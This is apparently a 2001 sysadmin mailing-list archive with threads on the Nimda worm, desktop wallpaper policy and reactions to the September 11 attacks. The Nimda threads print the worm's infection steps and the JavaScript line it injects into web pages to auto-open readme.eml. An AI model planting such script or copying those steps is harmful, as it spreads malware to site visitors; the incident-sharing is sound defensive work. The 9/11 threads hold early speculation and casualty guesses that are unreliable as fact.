through the e-mail and is automatically executed simply by previewing the 
message that contains it. 
To perform the infection it exploits a vulnerability 
discovered by the security expert Juan Carlos García Cuartango in Internet 
Explorer 5 browser, as well as Outlook and Outlook Express mail clients. 
This flaw allows for the automatic and immediate execution of files. This 
means no action, such as double-clicking the attached file, is necessary for 
the virus to be activated. However, it requires that the 'preview' option is 
enabled in the mail clients for the vulnerability to be exploited and 
README.EXE, the virus filename, to be executed.

I am not so sure thatthis assessment is entirely 
correct. For example, in my situation, I have a PC with Outlook2000 
and preview mode enabled. What I get is that when I click on the email a 
dialog box opens and prompts whether or not Iwish to save the file to 
disk - the README.EXE file that is.I just click cancel and then delete the 
email. I do not contract the virus.

John 
Due to this threat, Panda Software recommends to follow up 
the news appearing in the specialised media. It also warns against opening 
the mail client before the anti-virus is updated with the corresponding 
pav.sig, which will be made available to all users by the European 
multinational in the next few hours, together with the additional info about 
the virus.
-Original Message- From: 
[EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 18, 2001 12:21 PM To: NT System Admin Issues Subject: Fw: FW: 
Worm probes 
Here's one from a thread on nanog 
HTH, 
Geoff 
- Original Message - From: 
"Jim Olsen" [EMAIL PROTECTED] To: 
[EMAIL PROTECTED] Sent: Tuesday, September 18, 
2001 11:03 AM Subject: Re: FW: Worm probes 

  This is the information 
i've collected thus far on W32.nimda:  
 W32.nimda is NOT a code red variant, and the people 
who referring to it as  "Code Blue" were 
mistaken...   The 
name it has been given (at least by TruSecure) is W32.nimda.a.mm. It 
uses  several vulnerabilities 
in Windows NT and 2000 server's to infect a server,  and also employ's email and web 
site mobile code to infect Windows  9x/ME/NT/2k 
boxes.   During the 
initial infection of a server, the worm does the following:  - download a 
file named "admin.dll" via tftp from the system that is  trying to infect the target 
 - add 
the guest account to the local administrators group and  activates the account  - makes sure c$ 
is shared out  - copies itself 
to c, d, and e drives  - tries to mail 
itself to email addresses that it discovers on the  server  - creates a file 
named readme.exe, which is used in the mobile code  inserted on the web sites 
below  - add this 
string to the web pages found on the server:  
htmlscript language="JavaScript"window.open("readme.eml", 
null,  
"resizable=no,top=6000,left=6000")/script/html 
 - 
scans for and infects other vulnerable IIS servers  - goes through 
all shared directories and puts sample.nws,  
sample.eml, desktop.eml, desktop.nws in each directory. these are eml 
 messages with copies of itself (readme.exe) autoloaded 
by the mobile html  code mentioned above. 
 - goes 
through all shared directories and puts riched20.dll in each  directory, which is a trogan dll 
version of W32.nimda that is meant to  infect 
people running notepad/wordpad in that directory.  - puts a trojan 
mmc.exe in the winnt directory that is a copy of  itself in the above "readme.exe" format (win2000 only) 
  If a user views a web 
site that is hosted on an infected server, the  
following happens:  - upon viewing 
an infected page, the mobile code extracts to  
readme.exe and starts in windows media player (without user 
intervention)  - the user's 
machine becomes infected with W32.nimda at this point  and time  - the worm 
starts scanning for other vulnerable IIS servers  - the worm 
emails itself to everyone on the user's address book  - goes through 
all shared directories and puts 

RE: FW: Worm probes

2001-09-18 Thread RZorz
Title: RE: FW: Worm probes




Name: Nimda 
Alias: W32/Nimda 
Virus Categories: WORM (E-MAIL) 
Virus Families: W32 GROUP 
Repairable: Yes 
Date of Appearance: 09/18/2001 
Included in the "Wild List": No 
Activation Condition 
Basic Information: W32/Nimda is a worm that spreads by e-mail and exploits a 
vulnerability in Windows98 and Windows2000 that makes it possible to run 
Audio/X-wav files through Windows Explorer. To ensure its propagation, this worm 
sends out a message that includes an attachment with the following name: 
README.EXE. This file pretends to be an Audio/Xwav file coded in Base64 format. 
After being decoded, the executable file that contains the worm is 57344 bytes 
long. 
One of the actions carried out by this worm consists of sharing the drive C: 
of the affected computer in order to spread to other network drives.

Means of Propagation This worm uses e-mail to spread to other systems. To do 
this it sends out messages containing an attachment with the following name: 
README.EXE. 

Symptoms of Infection This worm creates several files in the Windows 
temporary directory. Although the content of these files is basically very 
similar to the original file, it does present certain variations. Additionally, 
it creates a file called Wininit.ini in the Windows directory.
The worm is coded to download a file called Admin.dll. To do this it uses an 
application called Tftp.exe. Finally, the worm creates a new user through which 
it shares the C drive and attempts to spread to other network drives. 
Additionally, it exploits a vulnerability in Windows98 and Windows2000 that 
makes it possible to run Audio/X-wav files through Windows 
Explorer.

  -Original Message-From: Ray Zorz Sent: 
  Tuesday, September 18, 2001 12:58 PMTo: NT System Admin 
  IssuesSubject: RE: FW: Worm probes
  reg 
  hack to not execute perhaps? 
  
-Original Message-From: John Cesta - Lists 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 18, 2001 12:57 
PMTo: NT System Admin IssuesSubject: RE: FW: Worm 
probes


  -Original Message-From: 
  [EMAIL PROTECTED] 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  18, 2001 3:26 PMTo: NT System Admin IssuesSubject: 
  RE: FW: Worm probes
  From Panda (note they won't have a sig file for a few 
  hours yet): Panda Software alerts users on the 
  appearance of W32/Nimda.A@mm (alias Nimda), possibly originated in China, 
  which spreads through the e-mail and is automatically executed simply by 
  previewing the message that contains it. 
  To perform the infection it exploits a vulnerability 
  discovered by the security expert Juan Carlos García Cuartango in Internet 
  Explorer 5 browser, as well as Outlook and Outlook Express mail clients. 
  This flaw allows for the automatic and immediate execution of files. This 
  means no action, such as double-clicking the attached file, is necessary 
  for the virus to be activated. However, it requires that the 'preview' 
  option is enabled in the mail clients for the vulnerability to be 
  exploited and README.EXE, the virus filename, to be executed.
  
  I am not so sure thatthis assessment is entirely 
  correct. For example, in my situation, I have a PC with Outlook2000 
  and preview mode enabled. What I get is that when I click on the email a 
  dialog box opens and prompts whether or not Iwish to save the file 
  to disk - the README.EXE file that is.I just click cancel and then delete 
  the email. I do not contract the virus.
  
  John 
  Due to this threat, Panda Software recommends to follow up 
  the news appearing in the specialised media. It also warns against opening 
  the mail client before the anti-virus is updated with the corresponding 
  pav.sig, which will be made available to all users by the European 
  multinational in the next few hours, together with the additional info 
  about the virus.
  -Original Message- From: 
  [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 18, 2001 12:21 PM 
  To: NT System Admin Issues Subject: Fw: FW: Worm probes 
  Here's one from a thread on nanog 
  HTH, 
  Geoff 
  - Original Message - From: 
  "Jim Olsen" [EMAIL PROTECTED] To: 
  [EMAIL PROTECTED] Sent: Tuesday, September 
  18, 2001 11:03 AM Subject: Re: FW: Worm 
  probes 
This is the information 
  i've collected thus far on W32.nimda:  
   W32.nimda is NOT a code red variant, and the people 
  who referring to it as  "Code Blue" were 
  mistaken...   The 
  name it has been given (at least by TruSecure) is W32.nimda.a.mm. 
  It uses  several 
  vulnerabilities in Windows NT and 2000 server's to infect a 
  server,  and also employ's 
  email and web site mobile code to infect Windows  9x/ME/NT/2k 

RE: Splash screens and wallpaper

2001-09-17 Thread RZorz
Title: RE: Splash screens and wallpaper





not sure about the splash screen. Wallpaper can done with policies. 


-Original Message-
From: Dan Munley [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 17, 2001 1:06 PM
To: NT System Admin Issues
Subject: Splash screens and wallpaper




I have been asked to do two things.


1. Present a splash screen that everyone will see for 5 or 10 seconds
during the logon or boot.


2. Change everyone's desktop wallpaper to some uniform graphic.


I am looking for suggestions and would appreciate any help. I have
previously created mandatory wallpaper using the registry editor and logon
scripts. 


Thanks,


Dan Munley


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: The idiocy continues!

2001-09-13 Thread RZorz
Title: RE: The idiocy continues!





He's not saying that everyone doesn't deserve the rights, only that the Constitution is for U.S. citizens. We have no jurisdiction outside of our borders, although part of the reason many other governments fear/hate/whatever the US is we think we should impose our Constitutional principles on their people too. 


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 13, 2001 10:54 AM
To: NT System Admin Issues
Subject: RE: The idiocy continues!



I apologize for adding to this thread but I could not help myself.


Saying that someone who lives outside of our country does not deserve the
same basic rights they we enjoy is pretty much off the mark. If I remember
correctly our Constitution says all men are created equal.


Every man, woman, and child should be treated like a human being, no matter
their country of origin. 


Now, I am not saying be nice or even be civil to scum that masterminded the
attacks in NYC. Personally I would like to see the SOB's head on a pike in
Central Park.


All this is my humble opinion.


--Dan


-Original Message-
From: Puckett, Matt [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 13, 2001 10:22 AM
To: NT System Admin Issues
Subject: RE: The idiocy continues!



But lets remember that these rights are for americans only(no offense) and
should not be used to protect the guilty hiding in other countries. They
are not subject to our rights therefore no need for a trial.


Matthew Puckett MCSE, MCP+Internet, MCP 
Customer Support Analyst 
Sprint PCS
IT Service Delivery 
Bristol Customer Care Center 
1-423-967-3086 - PCS 




-Original Message-
From: Benjamin Scott [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 13, 2001 1:09 PM
To: NT System Admin Issues
Subject: RE: The idiocy continues!



On Thu, 13 Sep 2001, Stuart Tonge wrote:
 What kind of civil liberties?


 For those outside the US, who may not be familiar with our government,
here
is a bit of a crash course:


 The foundation of our (i.e., the United States of America) government is
our Constitution. The first ten Amendments to same are called The Bill of
Rights, and specifically address certain freedoms our government is not
allowed to restrict. An online copy is here:


 http://www.nara.gov/exhall/charters/billrights/billrights.html


 These form such a cornerstone of our political culture that all you have
to do is mention the First Amendment and people will know you are talking
about freedom of speech, press, and/or religion. I plead the Fifth is a
common expression meaning I am not going to answer that, because it might
get me in trouble.


 Whenever there is a major public criminal crisis, there are always those
who advocate restricting these rights in the name of security or need.
They do not seem to understand that the worst kind of crime is that
inflicted by your own government against you.


 In this case, we can expect people to claim:


 - We should punish people without a trial, or even evidence
 - We should punish people who have committed no crimes
 - We should close our borders
 - Police should be able to search anyone at any time without a warrant
 - Police should be able to monitor private communications without a
warrant


 Any of the above would violate the Bill of Rights.


-- 
Ben Scott [EMAIL PROTECTED]
| The opinions expressed in this message are those of the author and do not
|
| necessarily represent the views or policy of any other person, entity or
|
| organization. All information is provided without warranty of any kind.
|



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: Australian Expressing Sadness + Something to think about

2001-09-12 Thread RZorz
Title: RE: Australian Expressing Sadness + Something to think about





Last night while watching my son at Pop Warner football practice, this tragedy was of course the topic of conversation. It's amazing to me how many experts there are. 

One guy was talking about why Muslims hate Christians. Being pretty damn ignorant, I decided to do a little research this morning, and found this site - www.islam-guide.com. Maybe it's watered down a bit, and it doesn't explain religious fanaticism. But at least I understand their religion a little bit better. 

Just thought I throw this out. At least for me, education and understanding goes a long way.
 
-Original Message-
From: John Hornbuckle [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 12, 2001 8:33 AM
To: NT System Admin Issues
Subject: RE: Australian Expressing Sadness + Something to think about



On top of Revelation, the book of Daniel also makes for an interesting
read.


I'm not going to use this forum (or my employer's time) to proselytize.
I would just encourage those who do not believe that the Bible is the
word of God to maybe reconsider when Israel becomes involved in an
all-out war in the Middle East. If I'm wrong and the war never happens,
you can thumb your nose at me and laugh. But if I'm right and the war
DOES happen, grab yourself a Bible and start reading it with the state
of mind that it may not just be a book full of fiction after all.
Intellectuality and faith are not mutually exclusive.


That's all I'm going to say on the matter, so please withhold the flames
(unless you want to send them to me personally off the list).




John Hornbuckle
Network Manager
Taylor County School District
318 North Clark Street
Perry, FL 32347




-Original Message-
From: Matthew Western [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 7:55 PM
To: NT System Admin Issues
Subject: Australian Expressing Sadness + Something to think about



Hi People,
I'd just like to express sadness to all the people in the US effected by
the attacks on US. I think it's disgusting and should be punished.
While people everywhere are in a state of shock/uncertainty/fear it's
worth thinking about where each of us are going to spend our eternal
destiny. The Bible predicts basically a World War 3 where everyone will
attack Israel and try to wipe them off the face off the earth...
Revelation is an interesting book to read through Have a good
day (and think about the following excert). Regards Matthew



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack



You 
can't retaliate for the sake of retaliating. It could be Americans. 


  -Original Message-From: David James 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 
  11, 2001 8:45 AMTo: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist Attack
  I 
  don't mean to promote war, but we as a country HAVE to retaliate to 
  this...
  F00k 
  the 3rd world countries that harbor terrorists...
  
-Original Message-From: Mal Sasalu 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
10:33 AMTo: NT System Admin IssuesSubject: RE: NewYork 
Terrorist Attack



I 
watched over the television. The structures of both north and south towers 
of WTO came down with a huge blast and now they are basically a heap of 
rubble.
-Original 
Message-From: Rogers, 
Jeff L (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 9:30 
AMTo: NT System Admin 
IssuesSubject: RE: NewYork 
Terrorist Attack

Could you confirm either 
more or less whether the structures are basically now grade 
level? 

-Original 
Message- 
From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 10:24 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


Im about 40 blocks from 
the towers and we were all told we can go home but all the bridges and 
subways are closed so here i am trying to figure out a way to get to 
brooklyn. 

Roman 
Bogdanov 
Head of IT Support Jnana Technologies 
Corp. 
www.jnana.com 212-560-9151 ext. 
202 
212-560-9066 fax 

-Original 
Message- 
From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 11:24 AM 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


Us in Jersey City, NJ 
(just across the water) were evacuated and sent home. Its going to be a long 
day for all. 

-Original 
Message- 
From: Jeff Pace [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 11:26 AM 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


and it doesn't seem to be 
over yet. 

Jeff 
-Original 
Message- 
From: Andrew Baker [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 8:19 AM 
To: NT System Admin 
Issues 
Subject: RE: NewYork Terrorist 
Attack 


This is an incredibly 
tragic day. 

Probably the most tragic 
for the US since the assassination of JFK 
 - ASB  

-Original 
Message- 
From: Richard McMahon [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 
11, 2001 11:07 AM 
To: NT System Admin 
Issues 
Subject: NewYork Terrorist 
Attack 


Check out this 
link. 

http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 102, 00.html 
Hope out all you guys in 
the New York area are still with us.. 
Good 
luck, 

Richard 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack



they're both effectively down. 

  -Original Message-From: David N. Precht 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
  8:36 AMTo: NT System Admin IssuesSubject: RE: NewYork 
  Terrorist Attack
  the 
  second tower hit was about 50 floors toppled... not sure of the other 
  tower
  
-Original Message-From: Rogers, Jeff L (OM) 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
11:30To: NT System Admin IssuesSubject: RE: NewYork 
Terrorist Attack
Could you confirm either more or less whether the structures 
are basically now grade level? 
-Original Message- From: 
Roman Bogdanov [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 10:24 To: NT System Admin Issues Subject: RE: 
NewYork Terrorist Attack 
Im about 40 blocks from the towers and we were all told we 
can go home but all the bridges and subways are 
closed so here i am trying to figure out a way to 
get to brooklyn. 
Roman Bogdanov Head of IT 
Support Jnana Technologies Corp. www.jnana.com 212-560-9151 ext. 202 
212-560-9066 fax 
-Original Message- From: 
Richard Newton Jr. [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:24 AM To: NT System Admin Issues Subject: RE: 
NewYork Terrorist Attack 
Us in Jersey City, NJ (just across the water) were evacuated 
and sent home. Its going to 
be a long day for all. 
-Original Message- From: 
Jeff Pace [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:26 AM To: NT System Admin Issues Subject: RE: 
NewYork Terrorist Attack 
and it doesn't seem to be over yet. 
Jeff 
-Original Message- From: 
Andrew Baker [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 8:19 AM To: NT System Admin Issues Subject: RE: 
NewYork Terrorist Attack 
This is an incredibly tragic day. 
Probably the most tragic for the US since the assassination 
of JFK 
- ASB  
-Original Message- From: 
Richard McMahon [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:07 AM To: NT System Admin Issues Subject: NewYork 
Terrorist Attack 
Check out this link. 
http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 
102, 00.html 
Hope out all you guys in the New York area are still with 
us.. 
Good luck, 
Richard 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
http://www.sunbelt-software.com/ntsysadmin_list_charter.htmhttp://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack





http://www.newbie.net/PearlHarbor/casualties.html - Not even close to the number of estimated deaths today. 


-Original Message-
From: John Hornbuckle [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 9:07 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



How many were killed at Pearl Harbor?




John Hornbuckle
Network Manager
Taylor County School District
318 North Clark Street
Perry, FL 32347 


-Original Message-
From: Nail, Larry [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 12:00 PM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



Try Perl Harbor...


-Original Message-
From: Andrew Baker [mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 10:19 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



This is an incredibly tragic day.


Probably the most tragic for the US since the assassination of JFK



- ASB



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack





There will be tons of speculation as our imaginations, paranoia and anger continue to grow. Every supposed expert the news organizations can find will have a theory. 

-Original Message-
From: Sean Martin [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 9:42 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



It's starting to be more believed that multiple terrorist groups and even
governments would have to be involved to orchestrate such a coordinated
attack on the US.


Regards,

Sean Martin, MCSE
Network Administrator
Ribelin Lowell  Company
Insurance Brokers, Inc.
3111 C Street, Suite 300
Anchorage, Alaska 99503
Ph: (907) 561-1250
Fax: (907) 561-4315
Cell: (907) 229-0885
Email: [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] 



-Original Message-
From: Sankaranarayanan_Ganapathy [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 8:09 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



Most possible culprit could be Osma bin laden afghan based terrorist,bcoz of
the kind of resources used or it could be any one from within America


 --
 From:  Phillips, Glen[SMTP:[EMAIL PROTECTED]]
 Reply To:  NT System Admin Issues
 Sent:  Tuesday, September 11, 2001 9:18 PM
 To:  NT System Admin Issues
 Subject:  RE: NewYork Terrorist Attack
 
 Apparently some Palestinian organisation has claimed responsibility. The
 Islamic groups have denied it all.
 
 
  -Original Message-
  From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED]]
  Sent: Tuesday, 11 September 2001 16:43
  To: NT System Admin Issues
  Subject: RE: NewYork Terrorist Attack
 
 
  You can't retaliate for the sake of retaliating. It could be
 Americans. 
   -Original Message-
   From: David James [mailto:[EMAIL PROTECTED]]
   Sent: Tuesday, September 11, 2001 8:45 AM
   To: NT System Admin Issues
   Subject: RE: NewYork Terrorist Attack
 
 
   I don't mean to promote war, but we as a country HAVE to
 retaliate to this...
   F00k the 3rd world countries that harbor terrorists...
-Original Message-
From: Mal Sasalu [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 10:33 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack
 
 


I watched over the television. The structures of
 both north and south towers of WTO came down with a huge blast and now
 they are basically a heap of rubble.
-Original Message-
From: Rogers, Jeff L (OM)
 [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 9:30 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack

Could you confirm either more or less whether the
 structures are basically now grade level? 
-Original Message- 
From: Roman Bogdanov [ mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 10:24 
To: NT System Admin Issues 
Subject: RE: NewYork Terrorist Attack 

Im about 40 blocks from the towers and we were all
 told we can go home 
but all the bridges and subways are closed so here i
 am trying to figure 
out a way to get to brooklyn. 
Roman Bogdanov 
Head of IT Support 
Jnana Technologies Corp. 
www.jnana.com 
212-560-9151 ext. 202 
212-560-9066 fax 

-Original Message- 
From: Richard Newton Jr. [
 mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:24 AM 
To: NT System Admin Issues 
Subject: RE: NewYork Terrorist Attack 

Us in Jersey City, NJ (just across the water) were
 evacuated and sent 
home. 
Its going to be a long day for all. 
-Original Message- 
From: Jeff Pace [ mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:26 AM 
To: NT System Admin Issues 
Subject: RE: NewYork Terrorist Attack 

and it doesn't seem to be over yet. 
Jeff 
-Original Message- 
From: Andrew Baker [ mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 8:19 AM 
To: NT System Admin Issues 
Subject: RE: NewYork Terrorist Attack 

This is an incredibly tragic day. 
Probably the most tragic for the US since the
 assassination of JFK 
 
- ASB 
 

-Original Message- 
From: Richard McMahon [
 mailto:[EMAIL PROTECTED]] 
Sent: Tuesday, September 11, 2001 11:07 AM 
To: NT System Admin Issues 
Subject: NewYork Terrorist Attack 

Check out this link. 
  
 http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 
102, 
00.html 
Hope out all you guys in the New York area are still
 with us.. 
Good luck, 
Richard 

  
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 
  
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm 

  
 

RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack





Nothing but good thoughts to you Dennis. 


-Original Message-
From: Dennis Atherton [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 10:09 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



I have family that work there and in Battery Park.


There are usually 50,000 people in the two towers.


Start time is normally 8:00 AM for many, and this was 8:50 AM, so many would
be there.


It would take over 2 hours to evacuate each tower - working together.


Everyone needs to step back and see what happens, 


but I firmly believe there will be more that 20K PEOPLE dead out of this
tragedy.


Not numbers, but people.


This was a terrorist attack, meant to bring the most devastation with the
least risk.




-Original Message-
From: Jason Gauthier [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 11, 2001 10:03 AM
To: NT System Admin Issues
Subject: RE: NewYork Terrorist Attack



Woah there.


No one has said there are 20,000 people dead.
There were 20,000 poeple in the towers when the first plane hit.

I beleive Tower 1 was being evacuated when it was hit.



 -Original Message-
 From: Dennis Atherton [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 11, 2001 12:59 PM
 To: NT System Admin Issues
 Subject: RE: NewYork Terrorist Attack
 
 
 And you don't think, that with over 20,000 people dead, World 
 War 3 has not
 been started on our shores now
 
 -Original Message-
 From: Murray Binette [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 11, 2001 9:56 AM
 To: NT System Admin Issues
 Subject: RE: NewYork Terrorist Attack
 
 
 Well, I just hope that Bush (or the 'Puppet' as many 
 Canadians refer to
 him as) doesn't fly off the handle and start WWIII.
 
 -Original Message-
 From: Andrew Baker [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 11, 2001 10:08 AM
 To: NT System Admin Issues
 Subject: RE: NewYork Terrorist Attack
 
 
 I would say that the US already feels pretty alienated right now
 
 
 - ASB
 
 
 
 -Original Message-
 From: Richard McClary [mailto:[EMAIL PROTECTED]]
 Sent: Tuesday, September 11, 2001 11:51 AM
 To: NT System Admin Issues
 Subject: RE: NewYork Terrorist Attack
 
 
 Well, that's one of the reactions terrorism is trying to 
 provoke. Most
 of 
 the world finds US policy to be obnoxious, and a violent large scale 
 reaction will effectively alienate the US from the rest of the world.
 
 I don't mean to promote war, but we as a country HAVE to retaliate to
 this...
 F00k the 3rd world countries that harbor terrorists...
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 
 http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
 


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm



http://www.sunbelt-software.com/ntsysadmin_list_charter.htm





RE: NewYork Terrorist Attack

2001-09-11 Thread RZorz
Title: RE: NewYork Terrorist Attack



wow. Those of us that aren't there can't even imagine what you'all 
are going through. I just heard reports that at least in Phoenix, people 
are lining up like crazy to donate blood. It's something at least. 


  -Original Message-From: Paul Armstrong 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 
  2001 10:18 AMTo: NT System Admin IssuesSubject: RE: 
  NewYork Terrorist Attack
  Basically, 40K people work in the Towers and there is estimated 200K 
  people who pass thru the towers. most people who live in NJ and work in NY 
  have to take the path trains to get into the city which passes right under the 
  WTC! i actually witnessed the first plane hitting the tower from Brooklyn 
  while waiting for a cab. I am now at work and trapped in the city because all 
  trains  buses are locked down.
  
-Original Message-From: Rogers, Jeff L (OM) 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
11:41 AMTo: NT System Admin IssuesSubject: RE: NewYork 
Terrorist Attack
I 
heard 50+ thousand

  -Original Message-From: David N. Precht 
  [mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
  10:44To: NT System Admin IssuesSubject: RE: NewYork 
  Terrorist Attack
  any stats on how many people work/live in the WTC and/or 
  area? i estimated around 25k-50k ...
  
-Original Message-From: MLewis 
[mailto:[EMAIL PROTECTED]]Sent: Tuesday, September 11, 2001 
11:37To: NT System Admin IssuesSubject: RE: 
NewYork Terrorist Attack
Both World Trade Center buildings have fallen. There is 
only rubble where these historic structures stood.

Marcella D. 
Lewis
Network Administrator
[EMAIL PROTECTED]


"Excellence 
is in the details. Give attention to the details and excellence will 
come." (Perry Paxton)

  -Original Message-From: Rogers, Jeff L 
  (OM) [mailto:[EMAIL PROTECTED]]Sent: Tuesday, 
  September 11, 2001 11:30 AMTo: NT System Admin 
  IssuesSubject: RE: NewYork Terrorist 
  Attack
  Could you confirm either more or less whether the 
  structures are basically now grade level? 
  -Original Message- From: Roman Bogdanov [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 11, 2001 10:24 
  To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack 
  Im about 40 blocks from the towers and we were all 
  told we can go home but all the bridges and 
  subways are closed so here i am trying to figure out a way to get to brooklyn. 
  Roman Bogdanov Head of IT 
  Support Jnana Technologies Corp. 
  www.jnana.com 212-560-9151 
  ext. 202 212-560-9066 fax 
  -Original Message- From: Richard Newton Jr. [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 11, 2001 11:24 AM 
  To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack 
  Us in Jersey City, NJ (just across the water) were 
  evacuated and sent home. Its going to be a long day for all. 
  -Original Message- From: Jeff Pace [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 11, 2001 11:26 AM 
  To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack 
  and it doesn't seem to be over yet. 
  Jeff 
  -Original Message- From: Andrew Baker [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 11, 2001 8:19 AM 
  To: NT System Admin Issues Subject: RE: NewYork Terrorist Attack 
  This is an incredibly tragic day. 
  Probably the most tragic for the US since the 
  assassination of JFK 
  - ASB  
  -Original Message- From: Richard McMahon [mailto:[EMAIL PROTECTED]] 
  Sent: Tuesday, September 11, 2001 11:07 AM 
  To: NT System Admin Issues Subject: NewYork Terrorist Attack 
  Check out this link. 
  http://www.skynews.co.uk/skynews/storytemplate/storytoppic/0,,3-1029 
  102, 00.html 
  Hope out all you guys in the New York area are still 
  with us.. 
